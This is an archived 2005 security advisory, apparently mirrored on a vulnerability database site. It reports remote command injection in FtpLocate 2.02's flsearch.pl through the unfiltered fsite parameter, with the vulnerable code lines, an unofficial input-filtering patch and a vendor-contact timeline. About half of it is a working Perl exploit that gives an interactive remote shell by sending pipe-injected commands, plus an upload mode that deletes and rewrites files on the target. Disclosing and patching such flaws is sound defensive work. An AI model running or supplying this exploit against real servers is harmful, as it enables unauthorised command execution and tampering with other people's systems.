Vulners
Lucene search
flsearch.pl.txt
`Chroot Security Group Advisory 2005-07-25
Remote arbitrary code execution in FtpLocate 2.02 (current)
Summary:
FtpLocate is a ftp search engine supporting filename and description search.
A remote attack can run arbitary commands with the web server's privileges by
exploiting a unfiltered parameter in flsearch.pl.
Details:
FtpLocate contains a vulnerability that can allow an attacker to execute
arbitrary commands. The vulnerability is due to improper input validation of
user-supplied parameters (fsite) by the flsearch.pl script. Remote attackers can run arbitary commands with the web servers's privieges by adding a "|" or ";".
Vuln. Systems:
FtpLocate 1.5 - 2.02
Vuln. Code:
---
/ftplocate-2.02/bin/flsearch.pl :
# line 23 - 60
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
...
if ( $fsite eq "" ) {
...
} else {
$resultfname=$query_raw."-$fsite";
...
}
...
open (L, "$CACHEDIR/$resultfname"); # Game Over 1
---
/ftplocate-2.02/bin/flsearch.pl:
# line 53
do_flsearch($client, $query, $fsite, $resultfname);
/ftplocate-2.02/bin/flmodule.pl:
# line 526 537
if ( $fsite eq "" ) {
...
} else {
$optf="-F '$fsite'"; # for glimpse
...
}
# line 537
open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q' 2>/$TMPDIR/flsearch.tmp.$$|"); # Game Over 2
---
/ftplocate-2.02/bin/flmodule.pl:
# line 584
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 3
---
/ftplocate-2.02/bin/flmodule.pl:
# line 589
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; # Game Over 4
---
Unofficial Patch:
diff -urN flsearch.pl.orig flsearch.pl
--- flsearch.pl.orig 2005-07-22 17:48:52.502670968 +0800
+++ flsearch.pl 2005-07-22 17:56:00.979532584 +0800
@@ -20,7 +20,10 @@
$starttime=gettimeofday(); $starttimestr=timestr();
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); -$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
+$fsite=clean_str($input{'fsite'});
+# dangerous characters
+$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+$fsite_raw=CGI::escape($fsite); $page=$input{'page'};
$client=ip2fqdn(client_ip());
Vendor Response: 2005.07.15 Vendor notified via email.
2005.07.19 Vendor notified via email, again.
2005.07.25 No response. Advisory released.
Exploit Code:
#!/usr/bin/perl
#
# FtpLocate <= 2.02 (current) remote exploit
# VERY PRIVATE VERSION
# DO NOT DISTRIBUTE
#
# newbug Tseng [at] chroot.org
#
sub my_socket
{
my $s=IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "socket: ";
}
sub ch2hex
{
$chr = $_[0];
$out="";
for($i=0;$i<length($chr);$i++)
{
$ch = substr($chr,$i,1);
if($ch eq "\"")
{
$out.="%5c%22";
}
elsif($ch eq "\$")
{
$out.="%5c%24";
}
elsif($ch eq "\@")
{
$out.="%5c%40";
}
else
{
$out.="%".sprintf("%2.2x",ord($ch));
}
}
$out;
}
sub upload_file
{
print "local file: ";
chomp($lfile = <STDIN>);
print "remote file: ";
chomp($rfile = <STDIN>);
my $socket = &my_socket($host);
print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
close $socket;
print "remove $host:$rfile done.\n";
my @DATA = `cat $lfile`;
$num=1;
$total = scalar @DATA;
foreach $DATA (@DATA)
{
$DATA = &ch2hex($DATA);
my $socket = &my_socket($host);
print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";
sleep(1);
close $socket;
$num++;
}
}
use IO::Socket::INET;
print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "")
{
$port = 80;
}
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
{
$ver = "1.0";
}
print "cmd/upload (cmd): "; chomp ($opt = <STDIN>);
if($opt eq "") {
$opt = "cmd";
}
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
{
$cgi = "/cgi-bin/ftplocate/flsearch.pl";
}
if($ver eq "1.0")
{
$junk = "HTTP/1.0\n\n";
}
}
else
{
$junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n"; }
if($opt eq "cmd")
{
while(1){
print "h4ck3r\@[$host]:~\$ ";
chomp ($cmd = <STDIN>);
if($cmd ne "")
{
print "Send command \"$cmd\" to $host ...\n";
$socket = &my_socket($host);
$cmd =~ s/\s/%20/g;
print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
print "done.\n";
}
}
}
elsif($opt eq "upload")
{
&upload_file($lfile);
}
print "done.\n";
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jul 2005 00:00Current
7.4High risk
Vulners AI Score7.4